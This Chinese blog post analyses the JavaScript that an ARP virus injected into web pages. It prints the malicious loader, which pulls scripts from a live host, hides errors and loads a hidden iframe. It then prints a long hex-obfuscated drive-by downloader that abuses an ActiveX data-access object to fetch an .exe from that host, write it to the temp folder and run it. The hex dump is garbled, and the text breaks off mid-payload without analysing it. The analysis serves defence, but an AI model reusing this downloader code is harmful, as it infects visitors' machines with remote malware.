解析arp病毒背后利用的Javascript技术


请大家转载的时候注明引用出处（http://blog.csdn.net/michael_veking）以及作者信息（veking），谢谢！
本文的目的是探讨JS相关技术，并不是以杀毒为主要目的，杀毒只是为讲解一些JS做铺垫的，呵呵，文章有点长，倒杯咖啡或者清茶慢慢看，学习切勿急躁！
最近公司的网络中了这两天闹的很欢的ARP病毒，导致大家都无法上网，给工作带来了很大的不方便，在这里写下杀毒的过程，希望对大家能有帮助！
现象：打开部分网页显示为乱码，好像是随机的行为，但是看似又不是，因为它一直在监视msn.com，呵呵，可能和微软有仇吧，继续查看源代码，发现头部有一个js文件链接----<script src=http://9-6.in/n.js></script>；
来源：经过一番网络搜索，发现这个域名是印度域名，而IP地址却是美国的，而且域名的注册日期是7月25日，看来一切都是预谋好了的，还是不管这个了，先解决问题吧；
分析：
1、先把（http://9-6.in/n.js）这个JS文件下载下来，代码如下：
-----------------------------------------------------------------------------------------------------------
document.writeln("<script>window.onerror=function(){return true;}</script>");
document.writeln("<script src="http://9-6.in/S368/NewJs2.js"></script>");
document.writeln("<script>");
document.writeln("function StartRun(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = "Cookie1=" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ");
document.writeln("document.write(<iframe width=0 height=0 src="http://9-6.IN/s368/T368.htm"></iframe>);");
document.writeln("}");
document.writeln("}");
document.writeln("StartRun();");
document.writeln("</script>")
-----------------------------------------------------------------------------------------------------------
其中第一句window.onerror=function(){return true;}就先把JS错误屏蔽掉，真够狠的，呵呵，不这样怎么隐藏自己呢，哈哈！然后还有个JS文件http://9- 6.in/S368/NewJs2.js，先继续往下看，找到StartRun();运行一个函数，函数的主要作用是写COOKIE，日期为保存一天，然后还用隐藏框架加载了一个文件（http://9-6.IN/s368/T368.htm），其余就没有什么特别的了；
2、下载（http://9-6.in/S368/NewJs2.js）这个文件，代码如下：
-----------------------------------------------------------------------------------------------------------
StrInfo = "x3cx73x63x72x69x70x74x3ex77x69x6ex64x6fx77x2ex6fx6ex65x72x72x6fx72x3dx66x75x6ex63x74x69x6fx6ex28x29x7bx72x65x74x75x72x6e x74x72x75x65x3bx7dx3cx2fx73x63x72x69x70x74x3e" +"
"+
"x3cx73x63x72x69x70x74x3e" +"
"+
" x44x5ax3d\\x78x36x38\x78x37x34\x78x37x34\x78x37x30\x78x33x41\x78x32x46\x78x32x46\x78x33x39\x78x32x44\x78x33x36\x78x32x45\x78x36x39\x78x36x45\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x45\x78x36x35\x78x37x38\x78x36x35\x3b" +"
"+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +"
"+
"x66x75x6ex63x74x69x6fx6e x47x6ex4dx73x28x6ex29 " +"
"+
"x7b " +"
"+
" x76x61x72 x6ex75x6dx62x65x72x4dx73 x3d x4dx61x74x68x2ex72x61x6ex64x6fx6dx28x29x2ax6ex3b" +"
"+
" x72x65x74x75x72x6e \\x78x37x45\x78x35x34\x78x36x35\x78x36x44\x78x37x30\x2bx4dx61x74x68x2ex72x6fx75x6ex64x28x6ex75x6dx62x65x72x4dx73x29x2b\\x78x32x45\x78x37x34\x78x36x44\x78x37x30\x3b" +"
"+
"x7d " +"
"+
" x74x72x79 " +"
"+
"x7b" +"
"+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +"
"+
" x76x61x72 x42x66x3dx64x6fx63x75x6dx65x6ex74x2ex63x72x65x61x74x65x45x6cx65x6dx65x6ex74x28"\x78x36x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x29x3b" +"
"+
" x42x66x2ex73x65x74x41x74x74x72x69x62x75x74x65x28"\x78x36x33\x78x36x43\x78x36x31\x78x37x33\x78x37x33\x78x36x39\x78x36x34"x2c"\x78x36x33\x78x36x43\x78x37x33\x78x36x39\x78x36x34\x78x33x41\x78x34x32\x78x34x34\x78x33x39\x78x33x36\x78x34x33\x78x33x35\x78x33x35\x78x33x36\x78x32x44\x78x33x36\x78x33x35\x78x34x31\x78x33x33\x78x32x44\x78x33x31\x78x33x31\x78x34x34\x78x33x30\x78x32x44\x78x33x39\x78x33x38\x78x33x33\x78x34x31\x78x32x44\x78x33x30\x78x33x30\x78x34x33\x78x33x30\x78x33x34\x78x34x36\x78x34x33\x78x33x32\x78x33x39\x78x34x35\x78x33x33\x78x33x36"x29x3b" +"
"+
" x76x61x72 x4bx78x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x44\x78x36x39\x78x36x33\x78x37x32\x78x36x46\x78x37x33\x78x36x46\x78x36x36\x78x37x34\x78x32x45\x78x35x38"x2b"\x78x34x44\x78x34x43\x78x34x38\x78x35x34\x78x35x34\x78x35x30"x2c""x29x3b" +"
"+
" x76x61x72 x41x53x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x31\x78x36x34\x78x36x46\x78x36x34\x78x36x32\x78x32x45\x78x35x33\x78x37x34\x78x37x32\x78x36x35\x78x36x31\x78x36x44"x2c""x29x3b" +"
"+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +"
"+
" x41x53x2ex74x79x70x65x3dx31x3b" +"
"+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +"
"+
" x4bx78x2ex6fx70x65x6ex28"\x78x34x37\x78x34x35\x78x35x34"x2c x44x5ax2cx30x29x3b" +"
"+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +"
"+
" x4bx78x2ex73x65x6ex64x28x29x3b" +"
"+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +"
"+
" x4ex73x31x3dx47x6ex4dx73x28x39x39x39x39x29x3b" +"
"+
" x4ex6fx73x6bx73x6cx61x3d\x3b" +"
"+
" x76x61x72 x63x46x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x33\x78x37x32\x78x36x39\x78x37x30\x78x37x34\x78x36x39\x78x36x45\x78x36x37\x78x32x45\x78x34x36\x78x36x39\x78x36x43\x78x36x35\x78x35x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x34x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x2c""x29x3b" +"
"+
" x76x61x72 x4ex73x54x6dx70x3dx63x46x2ex47x65x74x53x70x65x63x69x61x6cx46x6fx6cx64x65x72x28x30x29x3b x4ex73x31x3d x63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2cx4ex73x31x29x3b x41x53x2ex4fx70x65x6ex28x29x3bx41x53x2ex57x72x69x74x65x28x4bx78x2ex72x65x73x70x6fx6ex73x65x42x6fx64x79x29x3b" +"
"+
" x41x53x2ex53x61x76x65x54x6fx46x69x6cx65x28x4ex73x31x2cx32x29x3b x41x53x2ex43x6cx6fx73x65x28x29x3b x76x61x72 x71x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x38\x78x36x35\x78x36x43\x78x36x43\x78x32x45\x78x34x31\x78x37x30\x78x37x30\x78x36x43\x78x36x39\x78x36x33\x78x36x31\x78x37x34\x78x36x39\x78x36x46\x78x36x45"x2c""x29x3b" +"
"+
" x6fx6bx31x3dx63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2b\\x78x35x43\x78x35x43\x78x37x33\x78x37x39\x78x37x33\x78x37x34

补充：web前端 , JavaScript ,